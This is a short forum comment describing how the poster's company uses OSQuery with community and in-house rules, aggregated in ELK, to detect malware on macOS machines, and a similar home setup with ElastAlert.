|
|
|
|
|
|
by atom_enger
2984 days ago
|
|
|
In a corporate setting: At Etsy we use OSQuery on all of our corp machines(macOS) to help with malware/virus detection. We use community rules: https://github.com/facebook/osquery/blob/master/packs/osx-at... In addition to community rules we also curate a bunch of rules in house from malware we've discovered across our fleet. We then aggregate this info into ELK and alert on it. At Home: OSQuery as well + tiny elk stack + Elastalert. Overkill for a typical home setup but I like it. |
|
|